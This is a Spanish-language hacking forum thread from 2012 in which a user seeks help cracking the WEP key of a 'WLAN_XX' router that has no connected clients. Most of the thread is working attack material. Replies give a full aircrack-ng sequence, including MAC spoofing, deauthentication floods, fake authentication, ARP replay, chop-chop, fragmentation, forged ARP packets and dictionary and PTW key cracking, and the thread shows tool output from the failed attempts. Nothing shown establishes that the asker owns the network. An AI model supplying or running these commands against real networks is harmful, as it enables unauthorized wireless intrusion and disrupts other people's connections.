Descifrar clave WEP sin clientes conectados de WLAN_XX [10 horas sin frutos]

Iniciado por Trepixxx, 2 Mayo 2012, 22:21 PM

0 Miembros y 1 Visitante están viendo este tema.

Trepixxx

Hola, ante todo resaltar que soy nuevo en el mundo de la seguridad wireless, aunque esto no quiere decir que no haya buscado e intentado diferentes métodos encontrados por la red. Escribo para pedir ayuda sobre una cuestión, y para ello os pongo en situación:
Estoy intentando descifrar una clave WEP de una red WLAN_XX sin ningún cliente conectado.
Mi problema es que al no haber ningún cliente no hay #data y tampoco ARP request.
Pensé que quizás mi tarjeta de red no podía inyectar, con wifiway 2.0 (live cd) descarté esta opción, ya que la prueba de inyección que realicé (en mon0) fue un éxito.

He intentado varios métodos pero ninguno ha dado resultados.

Primero intenté un A1+A3. Después de 6 horas lo descarté al leer que un falsa autentificación no genera ARP request.

Luego creé un diccionario con una herramienta de wifiway 2.0, lo que sin #data no me servía de nada.
Entonces leí que con el móvil, podía crear un tráfico al intentar conectarme a la red aunque fuera con una contraseña errónea.
Generé tráfico así y conseguí unas 20#data y junto con el diccionario lo intenté aunque por desgracia no funcionó.

También intente un A4 (chop-chop), pero claro, el router primero debe soltar un paquete, cosa que en mi caso después de más de 10 horas seguidas puedo decir que NO hace. Intenté con mi móvil hacer lo mismo que en el paso anterior, pero, se ve que esos paquetes generados por mi en el intento de conexión no sirven, os dejo el mensaje que me sale:

Size: 368, FromDS: 0, ToDS: 1   (WEP)
           BSSID = Mac del router
           Dest. MAC = FF:FF:FF:FF:FF:FF
           Source Mac = Mac de mi movil

           (paquete)
Use this packet? y
Saving chosen packet in replay.......
The chop chop attack appears to have failed. Possible reasons:
* You're trying to inject ith an unsupported chpset (Centrino?)
* The driver source wasn't properly patched for injection support.
* Your are too far from the AP. Get closer or reduce the send rate
* Target is 802.11g only but you are using Prism2 or RTL8100
* The wireless interface isn't setup on the correct channel
* The client MAC you have specified is not currently authenticated
* Try running another aireplay-ng to fake authentication (attack "-1")
* The AP isn't vulnerable whe operating in authenticated mode.
* Try aireplay in non-authenticated mode instead (no -h option)


También he intentado un A5 (fragmentation), con el procedimiento del móvil para obtener un paquete, resultado:
Data packet found!
Sending fragmented packetSending fragmented packet
No answer, repeating...
Try a LLC NULL packet
No answer, repeating...
Try a LLC NULL packet
Sending fragmented packet
No answer, repeating...
Try a LLC NULL packet
Got a deauthentification packet!
.
.
.

Entonces ya desesperado leí que de vez en cuando el router suelta algún ARP, y lo dejé de 10 de la mañana a 20.00 de la noche sin obtener ningún ARP.

Mi pregunta es: hay alguna manera de conseguir algunoso ARP request, o #data, en mi situación?
Llevo 4 días sin parar intentándolo con estos métodos y algún otro.
Cualquier solución, idea, concepto, link u otros serán bienvenidos.
Muchas gracias.

Jenag

Desde mí opinión , sería mejor que te asociaras bién y que estes seguro y mejor sí hay algún cliente asociado mejor , sí no prueba a atacar al WLAN_XX en intervalos de 5 o 6 minutos :
aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
y luego a continuar lo básico :
ifconfig wlan1 down hw ether xx:xx:xx:xx:xx:xx
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0                                                                                 
                                                                         
airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w file mon0

aireplay-ng -1 0 -D -j -o 0 -q 600 -g 600 -x 1024 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0
                                                                                       
aireplay-ng -3 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e WLAN_XX mon0

aireplay-ng -5 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e WLAN_XX mon0

aireplay-ng -4 -D -j -o 0 -q 600 -g 600 -x 1024 mon0 -h xx:xx:xx:xx:xx:xx -e WLAN_XX

packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -k 255.255.255.255 -l 255.255.255.255.255 -y loquesea.xor -w arp-request 
aireplay-ng -2 -r arp-request mon0

aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c  mon0
aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

aircrack-ng -w /home/Jenag/.Root/.pass/.pass/lucifer.lst *.cap
aircrack-ng -z xx:xx:xx:xx:xx:xx *.cap
:-*
Para comentarme algo : Evamr1991@openmailbox.org : Válido para Bots y Robots..

Trepixxx

Con asociado te refieres que haga una falsa autentificación en el router?
El -0 no era para des-autentificar? A quien desautentifico si no hay nadie?
Qué hace el:
packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -k 255.255.255.255 -l 255.255.255.255.255 -y loquesea.xor -w arp-request
aireplay-ng -2 -r arp-request mon0

En qué comando puedo generar o provocar que el router emita un ARP request?

Gracias de antemano.

Jenag

Sí , sí no hay nadie asociado ataca al mismo ruter durante intervalos cortos en un periodo de tiempo.
a lo otro es para inyectar hay bastante info en el foro , suerte. :-*

http://foro.elhacker.net/wireless_en_linux/backtrack_no_me_captura_data_en_mi_portatil-t355704.0.html

:-*
Para comentarme algo : Evamr1991@openmailbox.org : Válido para Bots y Robots..

Trepixxx

Cita de: Jenag en  2 Mayo 2012, 23:48 PM
Desde mí opinión , sería mejor que te asociaras bién y que estes seguro y mejor sí hay algún cliente asociado mejor , sí no prueba a atacar al WLAN_XX en intervalos de 5 o 6 minutos :
aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
y luego a continuar lo básico :
ifconfig wlan1 down hw ether xx:xx:xx:xx:xx:xx
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0                                                                                 
                                                                         
airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w file mon0

aireplay-ng -1 0 -D -j -o 0 -q 600 -g 600 -x 1024 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0
                                                                                       
aireplay-ng -3 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e WLAN_XX mon0

aireplay-ng -5 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e WLAN_XX mon0

aireplay-ng -4 -D -j -o 0 -q 600 -g 600 -x 1024 mon0 -h xx:xx:xx:xx:xx:xx -e WLAN_XX

packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -k 255.255.255.255 -l 255.255.255.255.255 -y loquesea.xor -w arp-request 
aireplay-ng -2 -r arp-request mon0

aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c  mon0
aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

aircrack-ng -w /home/Jenag/.Root/.pass/.pass/lucifer.lst *.cap
aircrack-ng -z xx:xx:xx:xx:xx:xx *.cap
:-*

vale, pero
aireplay-ng -0 6 -j -D -o 0 -q 60 -g 60 -x 60 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
que va a -a i que va a -c???

ruben1980

ufffff........... yo creo que os estais liando un poco, aqui tienes la guía del aircrack..... muy completita..... échale un vistazo y pruba atacar sin cclientes conectados..... vi que te decian que utilizases el packetforge, pero primero necesitas hacer el ataque chopchop para generar el archivo *.xor.... bueno, no me enrollo más!!!!

http://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html
Más grande que el AMOR a la libertad es el ODIO a quien te la quita.

Trepixxx

Mi problema es que el router no suelta NINGÚN paquete para poder reinyectar. Nada después de 6 horas no suelta ni una #data.

ruben1980

Leiste la guía???  :huh:

A ver, el "packetforge" sirve para crear el paquete arp que será el que reenviarías con el ataque -2 del aireplay.... sinó recuerdo mal en la guía explica como y cuando utilizarlo....

De todas formas yo he llegado a generar paquetes #data intentando conectarme al router con una clave errónea.... no sé si te servirá.... yo lo hice como prueba contra mi router.... a mi me sirvió  :silbar: lo suficiente para que el chopchop me generara el paquete..... pero ya te digo que yo lo hice contra mi mismo. Prueba a ver....

Por cierto, cuando se habla de asociarte..... tienes razón, no es el ataque -0, es el -1 #aireplay-ng -1 0 -e WLAN_XX -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0

Un saludo.
Más grande que el AMOR a la libertad es el ODIO a quien te la quita.